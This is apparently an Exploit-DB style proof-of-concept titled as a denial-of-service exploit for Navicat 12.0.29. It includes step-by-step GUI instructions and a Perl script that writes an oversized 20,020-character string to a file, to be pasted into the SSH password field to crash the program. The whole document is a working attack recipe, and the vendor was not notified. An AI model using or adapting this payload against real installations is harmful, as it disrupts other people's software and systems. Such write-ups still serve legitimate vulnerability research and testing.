# Exploit Title: Navicat 12.0.29 - 'SSH' - Denial of Service - DoS
# Discovery by: Fernando Mengali
# Discovery Date: 22 January 2024
# Vendor Homepage: https://www.navicat.com/es/
# Software Link: https://www.navicat.com/es/download/navicat-premium
# Vendor notification: Not reported
# Tested on: Windows XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Remote - Denial of Service (DoS)

# How to reproduce:
#1 - Run the Perl script: perl 24-exploit-perl.pl
#2 - Open exploit.txt and copy its content to the clipboard.
#3 - Open navicat.exe.
#4 - Click "Conexion" and select "MySQL...".
#5 - In the "General" tab, give the connection a name in "Nombre de Conexion" (e.g. conexion1).
#6 - In the "SSH" tab, check "Uso de tunel SSH", then enter an IP address in the "Host" textbox (e.g. 127.0.0.1) and a username in "Nombre de usuario" (e.g. admin).
#7 - Make sure that "Metodo de autentificacion" is set to "Contrasena", then paste the clipboard content into "Contrasena".
#8 - Click "Aceptar".
#9 - Denial of Service

#!/usr/bin/perl
use strict;
use warnings;

# Build the oversized password string. The literal is single-quoted, so Perl
# does not expand the escape: the result is the four characters \x41
# repeated 5005 times (20020 characters in total).
my $exploit = '\x41' x 5005;

# Write the string to exploit.txt so it can be copied to the clipboard.
open(my $file, '>', 'exploit.txt') or die "Cannot open file: $!";
print $file $exploit;
close $file;

print "exploit.txt created!\n";